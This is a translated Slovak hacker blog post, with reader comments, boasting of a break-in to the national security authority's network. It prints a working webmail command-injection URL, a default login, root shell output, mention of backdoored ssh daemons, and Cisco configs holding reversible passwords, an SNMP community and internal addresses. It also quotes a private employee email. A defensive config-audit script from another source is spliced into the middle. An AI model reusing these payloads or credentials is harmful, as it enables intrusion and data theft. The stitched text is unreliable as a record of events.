Thanks to the primitive security of the aforementioned institution, the NBU's servers were anally penetrated without Milan's knowledge. 20 gigabytes of mails, internal documents, directives, regulations and similar cr** leaked from the NBU :)
It all started with jokes among friends who noticed a bug in the mail interface at webmail.nbusr.sk that made it possible to execute system commands on the server. (I know this sentence sounds completely stupid, but let people less versed in the subject understand it too ;))
That made it possible to grab the list of local users on the machine.
http://webmail.nbusr.sk/horde/services/help/
?show=about&module=;%22.passthru(%22cat%20%22.
chr(47).%22etc%22.chr(47).%22passwd%22);%27.
The user with the login nbusr stood out in particular
well...
A cruel joke - trying the password nbusr123 - nearly split our sides - the password worked (on the first try). The motd appeared and we were logged into the machine
after a little poking around and running about the box we tried su to root. Side-splitting attack number 2 :)
%su
www.nbusr.sk# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
www.nbusr.sk# uname -a
FreeBSD www.nbusr.sk 6.0-RELEASE FreeBSD 6.0-RELEASE #0:Thu Nov 3 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386
www.nbusr.sk#
so (for the uninitiated), gaining full rights over the server was possible from the nbusr login without entering any password whatsoever..
next came a scan of 10.0.240.0/24, which is the subnet the machine sits in. (so we were scanning machines that are not normally reachable from the internet and are supposed to be protected by a firewall ;)
about 5-6 machines responded, with sshd listening on them too.
so next we tried logging into one of these machines with the already known login and password nbusr/nbusr123. of course the situation repeated itself and we had a shell again.
this machine was named archive, which suggested there would be something interesting on it.
after about half an hour of running around the disk we found, in the home dir of one of the admins, the sources of some backup utility written in C. (btw quite decent code, although doing pgsql backups in C strikes me as scratching yourself
nbusr@archive> su
Password:
nbusr@archive# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
nbusr@archive# uname -a
FreeBSD archive.nbusr.sk 4.10-STABLE FreeBSD 4.10-STABLE #1: Mon Feb 14 14:47:10
CET 2005 root@archive.nbusr.sk:/usr/src/sys/compile/ARCHIVE i386
nbusr@archive#
another fit of laughter..
from archive we took away a roughly 18 GB database. another interesting machine was ep.nbusr.sk ;)
after obtaining this password practically the whole network opened up to us, since the password worked on all the other devices of unix (servers) or network (cisco routers/switches) character. in the evening backdoored ssh daemons were deployed on the machines, which logged the admins' movements across the other boxes (with passwords of course :) )
under cover of night, gigabytes of mails and other confidential data flowed merrily through the switches and routers to us, into the right hands, onto encrypted disks ;)
after the administrators' helpless moves, full access to the NBU network is still possible at the time of writing this article. anyone with minimal computer knowledge can access their data from the comfort of their own home. not everything that is secure is really secure, and not everything that is secret is all that secret :) the sad memento of this act is the finding that azet is a better-secured system than an institution overseeing highly confidential documents.
with this we say goodbye; greetings to grandma and the dog filip, feri.. I want world peace, a joyful life for all the children of the world and papers for everyone :)
a treat to finish, the national (in)security office:
(for fear of being accused of treason and burned at the stake we won't be publishing the documents)
soo, some prompts, configs, mails ;)
enjoy
update: since the whole situation turned into a decent scandal, you can also buy joke t-shirts.
root@fw.nbu.ba# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
root@fw.nbu.ba# uname -a
FreeBSD fw.nbu.ba 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Wed Jul 14 15:56:18 GMT 2004 kockac@builder.netlabplus.sk:/usr/src/release/picobsd/build_dir-fleshboxR/PICOBSD-fleshboxR i386
root@fw.nbu.ba#
root@fw.nbu.ba# df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/md0c 47M 24M 23M 52% /
root@fw.nbu.ba#
s4.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(14)EA1a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 02-Sep-03 03:33 by antonino
Image text-base: 0x80010000, data-base: 0x805C0000
ROM: Bootstrap program is CALHOUN boot loader
s4.nbu.ba uptime is 45 weeks, 5 days, 16 hours, 10 minutes
System returned to ROM by power-on
System restarted at 11:31:30 CETdst Sat Jun 4 2005
System image file is "flash:/c2950-i6q4l2-mz.121-14.EA1a.bin"
cisco WS-C2950-24 (RC32300) processor (revision M0) with 20710K bytes of memory.
Processor board ID FOC0752Y3BL
Last reset from system-reset
Running Standard Image
24 FastEthernet/IEEE 802.3 interface(s)
s7.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5)WC9, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Fri 19-Sep-03 10:01 by antonino
Image text-base: 0x00003000, data-base: 0x0034E434
ROM: Bootstrap program is C3500XL boot loader
s7.nbu.ba uptime is 45 weeks, 5 days, 15 hours, 13 minutes
System returned to ROM by power-on
System restarted at 12:08:39 CETdst Sat Jun 4 2005
System image file is "flash:c3500xl-c3h2s-mz.120-5.WC9.bin"
cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes of memory.
Processor board ID FAB0547P1KW, with hardware revision 0x00
Last reset from power-on
s9.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5.2)XU, MAINTENANCE INTERIM SOFTWARE
Copyright (c) 1986-2000 by cisco Systems, Inc.
Compiled Mon 17-Jul-00 18:29 by ayounes
Image text-base: 0x00003000, data-base: 0x00301F3C
ROM: Bootstrap program is C3500XL boot loader
s9.nbu.ba uptime is 45 weeks, 5 days, 14 hours, 46 minutes
System returned to ROM by power-on
System restarted at 12:34:15 CETdst Sat Jun 4 2005
System image file is "flash:c3500XL-c3h2s-mz-120.5.2-XU.bin"
cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes of memory.
Processor board ID FAB0514Q18E, with hardware revision 0x00
Last reset from power-on
s11.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(13)EA1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 04-Mar-03 02:14 by yenanh
Image text-base: 0x80010000, data-base: 0x805A8000
ROM: Bootstrap program is CALHOUN boot loader
s11.nbu.ba uptime is 3 weeks, 3 days, 11 hours, 30 minutes
System returned to ROM by power-on
System image file is "flash:/c2950-i6q4l2-mz.121-13.EA1.bin"
cisco WS-C2950G-24-EI (RC32300) processor (revision G0) with 20839K bytes of memory.
Processor board ID FOC0743Z2H9
Last reset from system-reset
Running Enhanced Image
24 FastEthernet/IEEE 802.3 interface(s)
2 Gigabit Ethernet/IEEE 802.3 interface(s)
well, and some cisco config ;)
root@archive# telnet 10.0.200.11
Trying 10.0.200.11...
Connected to 10.0.200.11.
Escape character is '^]'.
User Access Verification
Username: nbusr
Password:
s11.nbu.ba>ena
Password:
Password:
s11.nbu.ba#sh run
Building configuration...
Current configuration : 3761 bytes
!
version 12.1
no service pad
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
!
hostname s11.nbu.ba
!
enable password 7 101F5B4A514244
!
username nbusr password 7 070123595D1B485744
clock timezone CET 1
clock summer-time CETdst recurring last Sun Mar 2:00 last Sun Oct 3:00
ip subnet-zero
ip rcmd rsh-enable
ip rcmd remote-host monitor 10.0.240.7 monitor enable
ip rcmd remote-host www 10.0.240.7 www enable
no ip domain-lookup
!
spanning-tree mode pvst
no spanning-tree optimize bpdu transmission
spanning-tree extend system-id
!
!
interface FastEthernet0/1
description 919 - III 11 08
switchport trunk native vlan 999
switchport mode trunk
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/3
description 1118 - 18 2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/4
description 1116 - 16 5
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/5
description 1114 - 14 9
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/6
description 1114 - 14 10
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/7
description 1112 - 12 13
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/8
description 1111 - 11 15
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/9
description 1130 - 30 18
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/10
description 1124 - 24 30
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/11
description 1123 - 23 32
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/12
description 1122 - 22 33
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/13
switchport access vlan 3
switchport mode access
no ip address
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/14
no ip address
no cdp enable
!
interface FastEthernet0/15
no ip address
no cdp enable
!
interface FastEthernet0/16
no ip address
no cdp enable
!
interface FastEthernet0/17
no ip address
no cdp enable
!
interface FastEthernet0/18
no ip address
no cdp enable
!
interface FastEthernet0/19
no ip address
no cdp enable
!
interface FastEthernet0/20
no ip address
no cdp enable
!
interface FastEthernet0/21
no ip address
no cdp enable
!
interface FastEthernet0/22
no ip address
no cdp enable
!
interface FastEthernet0/23
no ip address
no cdp enable
!
interface FastEthernet0/24
no ip address
no cdp enable
!
interface GigabitEthernet0/1
no ip address
no cdp enable
!
!
interface GigabitEthernet0/2
no ip address
no cdp enable
!
interface Vlan1
ip address 10.0.200.11 255.255.255.0
no ip route-cache
!
ip default-gateway 10.0.200.1
no ip http server
!
no cdp run
snmp-server engineID local 00000009020000078432D3C0
snmp-server community swmon RO
!
line con 0
exec-timeout 0 0
logging synchronous
login local
stopbits 1
line vty 0 4
exec-timeout 0 0
logging synchronous
login local
line vty 5 15
exec-timeout 0 0
logging synchronous
login local
!
ntp clock-period 17179919
ntp server 213.215.72.7
end
and a vlan here and there :) :
s9.nbu.ba#sh vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gi0/1, Gi0/2
2 Servers active
3 Workstations active Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/15, Fa0/16, Fa0/17,
Fa0/18, Fa0/19, Fa0/20, Fa0/21,
Fa0/22, Fa0/23, Fa0/24
4 Govnet active Fa0/14
999 Dummy active
well, and this is paid for out of Slovak taxpayers' money ;)
(a sample of the mail communication of one of the employees)
Date: Fri, 24 Feb 2006 12:53:50 +0100
From: xxxx xxxx
Subject: ahojky
To: xxx xxx
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
Hi xxxx, xxxx says hello ("the bastard from Komjatice" hehe).
You haven't been in touch somehow from that London.... I know, there isn't that much time. And I don't write particularly often either... sorry!!! I don't even know what to write to you about,... I've never seen that much creativity in myself, haha
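As an added example (not code from the post or its authors), the following Python audit flags the weak settings visible in the s11 running-config above: reversible type 7 passwords where `enable secret` / `username ... secret` belong, rsh enabled, an SNMPv1/v2c community string, and vty lines that accept telnet and never time out. The config excerpt inside it is constructed, with placeholder type 7 strings; the parser accepts both indented and flattened (pasted) configs.

```python
import re
from typing import Iterator, List, Tuple

# Constructed excerpt of a Cisco IOS running-config with the weak settings seen
# in the switch config above; the type 7 strings are placeholders, not real values.
SAMPLE_CONFIG = """\
enable password 7 PLACEHOLDER
username nbusr password 7 PLACEHOLDER
ip rcmd rsh-enable
snmp-server community swmon RO
line vty 0 4
 exec-timeout 0 0
 login local
line vty 5 15
 exec-timeout 0 0
 login local
end
"""

# Sub-commands that may follow a "line ..." header. Pasted configs often lose
# indentation, so block membership is decided by keyword rather than whitespace.
LINE_SUBCOMMANDS = ("exec-timeout", "login", "logging", "stopbits",
                    "transport", "password", "access-class", "privilege")


def iter_line_blocks(config: str) -> Iterator[Tuple[str, List[str]]]:
    """Yield (name, sub-commands) for each 'line con/vty ...' section."""
    name, body = None, []
    for raw in config.splitlines():
        text = raw.strip()
        if text.startswith("line "):
            if name is not None:
                yield name, body
            name, body = text[5:], []
        elif name is not None and text.startswith(LINE_SUBCOMMANDS):
            body.append(text)
        elif name is not None:  # any other top-level command ends the block
            yield name, body
            name, body = None, []
    if name is not None:
        yield name, body


def audit_ios_config(config: str) -> List[str]:
    """Return one finding per weak setting; an empty list means nothing was flagged."""
    out = []
    if re.search(r"^enable password ", config, re.M):
        out.append("enable password: type 7 is reversible obfuscation, not a hash; use 'enable secret'")
    for m in re.finditer(r"^username (\S+) password \d ", config, re.M):
        out.append(f"username {m.group(1)}: recoverable password; use 'username {m.group(1)} secret'")
    if re.search(r"^ip rcmd rsh-enable", config, re.M):
        out.append("ip rcmd rsh-enable: rsh trusts only the source host and user name; disable it")
    for m in re.finditer(r"^snmp-server community (\S+) (RO|RW)", config, re.M):
        out.append(f"snmp community {m.group(1)} ({m.group(2)}): v1/v2c string travels in clear; use SNMPv3 or an ACL")
    for name, body in iter_line_blocks(config):
        if name.startswith("vty") and "transport input ssh" not in body:
            out.append(f"line {name}: no 'transport input ssh', telnet with cleartext logins is accepted")
        if "exec-timeout 0 0" in body:
            out.append(f"line {name}: exec-timeout 0 0 never expires idle sessions")
    return out
```

Running `audit_ios_config(SAMPLE_CONFIG)` yields eight findings; a config using `secret` hashes, `transport input ssh` and a non-zero `exec-timeout` yields none.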
didn't they have any porn?:)
hh you think those 18GB they pulled were just some boring data? It's obvious about 80% of it was porn.:]]
I think there's some XXX in the real NBU materials too ;)
yeah, exactly, I also think there'll be something like that in there, after all this is f***ing Slovakia, anything is possible here
that's true, and it'll surely end with nothing happening to those responsible.
repair of musical instruments
repair of musical instruments? go advertise somewhere else
__________
zero
I have to admit, I'm shocked.
And that email communication is really something,
plus their tough security policy, is it run by some temp workers? The ones who were stacking noodles on the shelves at Tesco before?
I'm not very familiar with public administration, but public administration must not use uncertified operating systems. certifications aren't handed out for nothing. as far as I know, FreeBSD is not among the certified systems. as far as I also know, the whole infrastructure has to fall under certain standards it is built on. so the use of those operating systems, a webserver plugged into both the external interface and the LAN, and the overall policy described all seem quite unrealistic to me.
all sorts of things can happen, but I'd lean more towards the view that the article is meant to massage public opinion a bit and see which pen the flock of sheep heads for.
In any case they have an unpatched horde there and that exploit is a good week old already ;-) so they're lamers either way...
anyway it's a pretty big embarrassment for such an institution IMHO/
Yes, and the author of the article is a lamer too, even though I don't much like the word lamer. Because linking one unpatched application with primitive security, and writing an article in the style it's written in at all.. that's lame and infantile. But let's rejoice like little Jarda with his sparklers..
if the author of the article links this with some great success, he can boast about it at most to his fellow students at the vocational school, and anally penetrate at most his pockmarked buddies. sure, it's a big deal that it was so "securely" secured, but I'd tip my hat if they had at least cracked some password and not what was there (that can't even be called a password). and the fact that judash slapped some made-up mail in here doesn't mean they pulled huGe gigas of mails from there. so, weak
well at least they achieved something...
and what did he achieve, please? find a bug in webmail? Yes, that he did. And maybe grab a few mails. Even a toddler on a PMD could do that. he's an ordinary braggart. anal penetration, he says. if he had downloaded or gotten somewhere further I wouldn't say a word. but he didn't have it in him.
ok you're right, I don't want to argue... I'm just saying at least he did something... these days everyone is all talk and no action.
The NBU hasn't issued a certificate for any OS other than win2k and xp.
computers holding documents classified "Confidential" must operate as standalone PCs not connected to a network.
After they found out from the newspapers and blackhole that their etc/passwd was visible, they finally reacted and since about 8:30 it's no longer visible...
I can still see it...
Mea culpa :) It's still visible... Stupid cut and paste.
And what relevant stuff do you read out of passwd? :) apart from username, *id, shell and home. We're talking about a BSD passwd.
What if you have ssh with keys and not passwords? Then what, are you going to exercise your English-Hindi-Farsi vocabulary? :) But securing passwords and access is maybe already a bit off topic now.
yaaaaaay kockac compiled their kernel :-))) I have to ask him about that :-))))
Ha ha that's really wild, but when I tried it it didn't even open the front page for me.
Tough luck for them, I'm not giving up.
Hey, how about showing some of that data, there must be some nice security clearances or other interesting stuff in those 20G ^^
Its evolution, baby
is this really such a backward country??? it has hackers and other smart people here, and instead of hiring them to secure their networks and computers, no, they catch them, instead of hiring them the way the Americans do
Decent advertising for blackhole ;) "23489 reads"
_______________________________
I don't need no arms around me,
I don't need no drugs to calm me...
Another brick in the wall
blackhole always knew how to get attention! :) First it was just azet and now straight to the NBU? Nice...
omg I haven't had such a laugh in a long time ... :D
simply hats off to the level of the NBU sysadmins. I swear to god, even my 100-year-old grandma would have secured those machines better.
e.g. in the USA the government pays the best hackers to secure top secret information, and here security is on the level of a coffee machine.
reverend, I'm going to throw up...
there are admins like this across the whole of public administration, so brains don't have to matter at all; it's the fault of this society we're in, the state would rather demand 8 university degrees on paper than what the person actually has in their head.......
agreed
totally agree, but consider, when they have government pay-scale salaries there, who would bother working??? well I don't know if I'd feel like it, I'd rather get out somewhere abroad ... (if it were up to me ;) )
Oh man, this has to be a joke, because I almost fell under the table reading it:)
a normal person wouldn't believe this is possible.
An office that manages extremely classified data and keeps it on certified windows server, XP, and on top of that has leaky servers connected to the internet, really uses taxes efficiently :-)
It could work as a sort of wargame, Hack your own NBU :D
Overall it seems strange, isn't it just a honeypot in the end? -), after all FreeBSD is really too open trusted. But why would they invest so much energy into a bunch of honeypots. unless the whole thing was a paranoid scheme so Kalinak could ask for more money for the NBUsr.
that occurred to me too.... but in my opinion that would already be a proper social hack.
but still. deliberately leaving security weak, someone is bound to come along...
but I doubt it.
the administrator (if he can be called that..) of nbusr.sk is apparently an idiot :-) loser! he makes me want to cry..
this makes me sick...
on JOJ they reported that they managed to get in contact with the attackers and there was a recording of a "conversation". I don't know whether to believe it. you might say, rely on your own judgement, but still. if by any chaaance :) someone closer to it turned up, they could comment. but I doubt it. but still, it's worth a try ;)
well I had a good laugh at that ;-))) JOJ is known for occasionally making things "more interesting"
but that talk in windows putty was quite funny ;-)
exactly. then a person doesn't know what's reality and what's fiction. and I definitely have no interest in playing believe-it-or-not
I don't watch TV and the only places I get information from are the internet and sme; with the internet I don't know, but from sme I expect a certain reality
---
all human inventions are just an attempt to imitate nature
Patrik Paukov
morons, instead of being glad that someone found the hole(s) in their system for free, they still want 8 years in custody for Them (respect!!). the only ones who should get it are those geniuses from the NBU who set super unguessable passwords.
well you're right about that... they should even thank those hackers...
Nothing is eaten as hot as it's cooked. Our dear prosecutor's office has started prosecution under section 247, which can only be applied after a decent dose of weed.
Personally I'm quite strongly convinced they'll have trouble proving one of the optional elements of the offence (sorry for the legalese) - motive...
And besides, a few more legal dirty tricks can be pulled out of the bag.
--------------
Eat lekvar, it's damn healthy!
nice readership, boys ;)
76146 reads
well, nice...
---------------------------------------
the talent to learn is a gift;
the ability to learn is a skill;
the willingness to learn is a choice;